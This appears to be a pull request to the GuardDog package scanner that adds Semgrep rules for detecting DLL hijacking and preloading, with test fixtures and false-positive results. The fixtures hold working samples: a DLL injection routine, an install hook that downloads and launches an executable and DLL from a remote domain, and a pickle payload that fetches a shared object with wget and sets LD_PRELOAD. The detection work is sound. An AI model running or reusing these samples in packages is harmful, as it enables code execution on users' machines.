### PR TITLE
Add DLL hijacking detection

### DIFF
--- a/README.md
+++ b/README.md
@@ -93,6 +93,7 @@ Source code heuristics:
 | download-executable | Identify when a package downloads and makes executable a remote binary |
 | exec-base64 | Identify when a package dynamically executes base64-encoded code |
 | silent-process-execution | Identify when a package silently executes an executable |
+| dll-hijacking | Identifies when a trusted application is manipulated into loading a malicious dll |
 | bidirectional-characters | Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/ |
 | steganography | Identify when a package retrieves hidden data from an image and executes it |
 | code-execution | Identify when an OS command is executed in the setup.py file |
@@ -126,6 +127,7 @@ Source code heuristics:
 | npm-exec-base64 | Identify when a package dynamically executes code through 'eval' |
 | npm-install-script | Identify when a package has a pre or post-install script automatically running commands |
 | bidirectional-characters | Identify when a package contains bidirectional characters, which can be used to display source code differently than its actual execution. See more at https://trojansource.codes/ |
+| npm-dll-hijacking | Identifies when a trusted application is manipulated into loading a malicious dll |
 | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
 
 Metadata heuristics:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -1,0 +1,69 @@
+rules:
+  - id: dll-hijacking
+    languages:
+      - python
+    message: This package manipulates a trusted application into loading a malicious dll
+    metadata:
+      description: identifies when a trusted application is manipulated into loading a malicious dll
+    pattern-either:
+
+      # dll side-loading
+      - pattern-either:
+        - patterns:
+          - pattern: "$DLL_LOAD"
+          - metavariable-pattern:
+              metavariable: $DLL_LOAD
+              pattern-either:
+                # load inline windows
+                - pattern-regex: (?i).*?\.exe.*?\.dll
+                # load inline linux
+                - pattern-regex: (?i).*?\/bin/.+\s+.*?\.so
+                # environment preload
+                - pattern-regex: LD_PRELOAD
+        - patterns:
+          - pattern: $FN(<...$EXE...>,...,<...$DLL...>)
+          - metavariable-pattern:
+              metavariable: $EXE
+              patterns:
+                # a string with .exe or /bin/[whatever] in it
+                - pattern: "..."
+                - pattern-regex: (?i).*?(\.exe|\/bin/.+)
+          - metavariable-pattern:
+              metavariable: $DLL
+              patterns:
+                # a string with .dll or .so in it
+                - pattern: "..."
+                - pattern-regex: (?i).*?\.(dll|so)
+
+      # dll injection
+      - pattern-either:
+        - pattern: ....WriteProcessMemory
+        - pattern: ....CreateRemoteThread
+        - pattern: ....LoadLibraryA
+
+      # phantom dll
+      - patterns:
+        # write a library to disk
+        - patterns:
+            - pattern: |
+                ...
+                open($DLL,'wb')
+                ...
+                $FN(...,<...$EXE...>,...)
+            - metavariable-pattern:
+                metavariable: $EXE
+                patterns:
+                  # a string with .exe or /bin/[whatever] in it
+                  - pattern: "..."
+                  - pattern-regex: (?i).*?(\.exe|\/bin/.+)
+            - metavariable-pattern:
+                metavariable: $DLL
+                patterns:
+                # a string with .dll or .so in it
+                  - pattern: "..."
+                  - pattern-regex: (?i)\.(dll|so)
+            - focus-metavariable: $DLL
+
+    severity: WARNING
+    options:
+      symbolic_propagation: true

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -4,7 +4,7 @@ rules:
       - python
     message: This package manipulates a trusted application into loading a malicious dll
     metadata:
-      description: identifies when a trusted application is manipulated into loading a malicious dll
+      description: Identifies when a trusted application is manipulated into loading a malicious dll
     pattern-either:
 
       # dll side-loading

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -4,7 +4,7 @@ rules:
       - javascript
     message: This package manipulates a trusted application into loading a malicious dll
     metadata:
-      description: identifies when a trusted application is manipulated into loading a malicious dll
+      description: Identifies when a trusted application is manipulated into loading a malicious dll
     pattern-either:
 
       # dll side-loading

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -1,0 +1,75 @@
+rules:
+  - id: npm-dll-hijacking
+    languages:
+      - javascript
+    message: This package manipulates a trusted application into loading a malicious dll
+    metadata:
+      description: identifies when a trusted application is manipulated into loading a malicious dll
+    pattern-either:
+
+      # dll side-loading
+      - pattern-either:
+        - patterns:
+          - pattern: "$DLL_LOAD"
+          - metavariable-pattern:
+              metavariable: $DLL_LOAD
+              pattern-either:
+                # load inline windows
+                - pattern-regex: (?i).*?\.exe.*?\.dll
+                # load inline linux
+                - pattern-regex: (?i).*?\/bin/.+\s+.*?\.so
+                # environment preload
+                - pattern-regex: LD_PRELOAD
+        - patterns:
+          - pattern: $FN(<...$EXE...>,...,<...$DLL...>)
+          - metavariable-pattern:
+              metavariable: $EXE
+              patterns:
+                # a string with .exe or /bin/[whatever] in it
+                - pattern: "..."
+                - pattern-regex: (?i).*?(\.exe|\/bin/.+)
+          - metavariable-pattern:
+              metavariable: $DLL
+              patterns:
+                # a string with .dll or .so in it
+                - pattern: "..."
+                - pattern-regex: (?i).*?\.(dll|so)
+
+      # dll injection
+      - pattern-either:
+        - pattern: ....WriteProcessMemory
+        - pattern: ....CreateRemoteThread
+        - pattern: ....LoadLibraryA
+
+      # phantom dll
+      - patterns:
+        # write a library to disk
+        - patterns:
+            - pattern: |
+                ...
+                $WRITE(...,<...$DLL...>,...)
+                ...
+                $FN(...,<...$EXE...>,...)
+            - metavariable-pattern:
+                metavariable: $WRITE
+                pattern-either: 
+                  - pattern: ....writeFileSync
+                  - pattern: ....writeFile
+                  - pattern: ....appendFile
+            - metavariable-pattern:
+                metavariable: $EXE
+                patterns: 
+                  # a string with .exe or /bin/[whatever] in it
+                  - pattern: "..."
+                  - pattern-regex: (?i).*?(\.exe|\/bin/.+)
+            - metavariable-pattern:
+                metavariable: $DLL
+                patterns:
+                # a string with .dll or .so in it
+                  - pattern: "..."
+                  - pattern-regex: (?i)\.(dll|so)
+            - focus-metavariable: $DLL
+
+    severity: WARNING
+    options:
+      symbolic_propagation: true

--- a/tests/analyzer/sourcecode/dll-hijacking.py
+++ b/tests/analyzer/sourcecode/dll-hijacking.py
@@ -1,3 +1,4 @@
+"""Injecting a DLL into a process"""
 def f():
     import sys
 
@@ -62,7 +63,12 @@ def f():
     )
     print("[+] Successful injection into PID: %s" % PID)
 
+"""OK: Injecting a DLL into a process"""
+def f():
+    # ok: dll-hijacking
+    x="This is a string containing CreateRemoteThread"
 
+"""Phantom DLL case planting a DLL and executing a builtin binary"""
 def f():
     class ActionOnInstall(install):
         def run(self):
@@ -93,14 +99,19 @@ def f():
                 f.write(rd)
             os.system("START " + dname + "\\ComServer.exe showdeskband")
 
-
+"""OK: Injecting a DLL into a process"""
 def f():
     import os
+    # ok: dll-hijacking
+    os.system("start explorer.exe c:\\")
 
+"""Known executable sideloading dll"""
+def f():
+    import os
     # ruleid: dll-hijacking
     os.system("RUNDLL32.EXE" + " some.dll, function")
 
-
+"""Preloading libraries in linux """
 def f():
     import os
     import pickle
@@ -116,3 +127,9 @@ def f():
         "http://10.0.0.3:5000/",
         cookies={"pickle": b64encode(pickle.dumps(Exploit())).decode()},
     )
+
+"""OK: Preloading libraries in linux"""
+def f():
+    # ok: dll-hijacking
+    # This is comment that mentions LD_PRELOAD
+    pass

--- a/tests/analyzer/sourcecode/dll-hijacking.py
+++ b/tests/analyzer/sourcecode/dll-hijacking.py
@@ -1,0 +1,118 @@
+def f():
+    import sys
+
+    dll_name = sys.argv[1]
+    dll_length = len(dll_name)
+    PID = sys.argv[2]
+    kernel32 = windll.kernel32
+
+    if len(sys.argv) < 2:
+        print("[!] Usage: ./PY-MEMJECT calc32.dll <PID>")
+        sys.exit(1)
+
+    PAGE_READWRITE = 0x04
+    PROCESS_ALL_ACCESS = 0x00F0000 | 0x00100000 | 0xFFF
+    VIRTUAL_MEM = 0x1000 | 0x2000
+
+    dwDesiredAccess = PROCESS_ALL_ACCESS
+    bInheritHandle = False
+    dwProcessId = int(PID)
+    # Opens the process object via OpenProcess()
+    loading_process = kernel32.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
+
+    hProcess = loading_process
+    lpAddress = 0
+    dwSize = dll_length
+    flAllocationType = VIRTUAL_MEM
+    flProtect = PAGE_READWRITE
+    # Allocates memory for the host process
+    allocate_memory = kernel32.VirtualAllocEx(
+        hProcess, lpAddress, dwSize, flAllocationType, flProtect
+    )
+    hProcess = loading_process
+    lpBaseAddress = allocate_memory
+    lpBuffer = dll_name
+    nSize = dll_length
+    lpNumberOfBytesWritten = byref(c_int(0))
+    # Copies the .DLL to the host process
+    # ruleid: dll-hijacking
+    write_memory = kernel32.WriteProcessMemory(
+        hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten
+    )
+
+    h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
+    h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA")
+
+    hProcess = loading_process
+    lpThreadAttributes = None
+    dwStackSize = 0
+    lpStartAddress = h_loadlib
+    lpParameter = allocate_memory
+    dwCreationFlags = 0
+    lpThreadId = byref(c_ulong(0))
+    # ruleid: dll-hijacking
+    code_execution = kernel32.CreateRemoteThread(
+        hProcess,
+        lpThreadAttributes,
+        dwStackSize,
+        lpStartAddress,
+        lpParameter,
+        dwCreationFlags,
+        lpThreadId,
+    )
+    print("[+] Successful injection into PID: %s" % PID)
+
+
+def f():
+    class ActionOnInstall(install):
+        def run(self):
+            import os
+            import tempfile
+            from urllib.request import Request, urlopen
+
+            temp_dir = tempfile.mkdtemp(prefix="DriverGenius")
+            dname = temp_dir
+
+            def dfile(url):
+                requestObj = Request(
+                    url,
+                    headers={
+                        "User-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; rv:97.0) Gecko/20100101 Firefox/97.0"
+                    },
+                )
+                responseObj = urlopen(requestObj)
+                content = responseObj.read()
+                return content
+
+            r = dfile("https://fus.rngupdatem.buzz/c.exe")
+            rd = dfile("https://fus.rngupdatem.buzz/dgdeskband64.dll")
+            with open(dname + "\\ComServer.exe", "wb") as f:
+                f.write(r)
+            # ruleid: dll-hijacking
+            with open(dname + "\\dgdeskband64.dll", "wb") as f:
+                f.write(rd)
+            os.system("START " + dname + "\\ComServer.exe showdeskband")
+
+
+def f():
+    import os
+
+    # ruleid: dll-hijacking
+    os.system("RUNDLL32.EXE" + " some.dll, function")
+
+
+def f():
+    import os
+    import pickle
+    from base64 import b64encode
+    import requests
+
+    class Exploit(object):
+        def __reduce__(self):
+            # ruleid: dll-hijacking
+            return eval, ('__import__("os").system("wget http://10.0.0.2/.so -O /tmp/.so") & __import__("os").environ.__setitem__("LD_PRELOAD", "/tmp/.so")')
+
+    requests.post(
+        "http://10.0.0.3:5000/",
+        cookies={"pickle": b64encode(pickle.dumps(Exploit())).decode()},
+    )

--- a/tests/analyzer/sourcecode/npm-dll-hijacking.js
+++ b/tests/analyzer/sourcecode/npm-dll-hijacking.js
@@ -1,3 +1,4 @@
+// Executable sideloading a DLL file
 function f() {
   try {
     process.chdir("E:\\Games\\ALT1Games\\TwelveSky1");
@@ -19,11 +20,29 @@ function f() {
   }
 }
 
+// OK: Run an Executable
 function f() {
-  // ruleid: npm-dll-hijacking
-  execute("LD_PRELOAD=/tmp/lib", "/usr/bin/binary");
+  // ok: npm-dll-hijacking
+  spawn('/usr/bin/python', ['-c', 'print("Hello World")'])
 }
 
+// Preloading libraries in linux  
+function f() {
+  // ruleid: npm-dll-hijacking
+  spawn("LD_PRELOAD=/tmp/lib", "/usr/bin/binary");
+}
+
+// Preloading libraries in linux  
+function f() {
+  /* 
+  Multiline comment 
+  // ok: npm-dll-hijacking
+  LD_PRELOAD=/tmp/lib /usr/bin/binary
+  */
+  return;
+}
+
+// Phantom DLL case planting a shared object file and executing a builtin binary
 function f() {
   const fs = require("fs");
 

--- a/tests/analyzer/sourcecode/npm-dll-hijacking.js
+++ b/tests/analyzer/sourcecode/npm-dll-hijacking.js
@@ -1,0 +1,42 @@
+function f() {
+  try {
+    process.chdir("E:\\Games\\ALT1Games\\TwelveSky1");
+    var injector = require("./build/release/injector");
+    // ruleid: npm-dll-hijacking
+    if (
+      injector.executeInject(
+        "TwelveSky.exe alt1games.twelvesky1:/test/test/0/18/0/2/1024/768",
+        "E:\\Games\\ALT1Games\\TwelveSky1\\TSX_Client.dll"
+      )
+    ) {
+      console.log("Process started and injected.");
+    } else {
+      console.log("Unable to execute and inject dll.");
+    }
+  } catch (err) {
+    console.error("Exception Thrown!");
+    console.error(err);
+  }
+}
+
+function f() {
+  // ruleid: npm-dll-hijacking
+  execute("LD_PRELOAD=/tmp/lib", "/usr/bin/binary");
+}
+
+function f() {
+  const fs = require("fs");
+
+  const postData = "";
+
+  // ruleid: npm-dll-hijacking
+  fs.writeFileSync("/tmp/.so", "utf8", (err, data) => {
+    if (err) {
+      console.error(err);
+      return;
+    }
+    postData = data;
+  });
+  
+  spawn('/usr/bin/program', ['-lah'])
+}


### PR DESCRIPTION
Adds new rule that detects when is attempted to load arbitrary DLL or Shared Object to gain execution.
The goal is to detect the most common patterns for DLL hijacking, among:

* DLL side-loading: an object is being fed to a non malicious application
* DLL injection: Append arbitrary code into a running process
* Phantom DLL: Plant a shared object or DLL into the system which is then loaded by a trusted executable

See [here](https://unit42.paloaltonetworks.com/dll-hijacking-techniques) for more information on techniques

A false positive analysis scan was performed with the following results:
- A test was ran against the top 500 npm packages, which produced **0 FP**
- A test was ran against the top 500 pypi packages, which produced **0 FP**
- A test was ran against the most interesting npm packages released last week **(~200)**, which produced **0 FP**
- A test was ran against the most interesting pypi packages released last week **(~275)**, which produced **0 FP**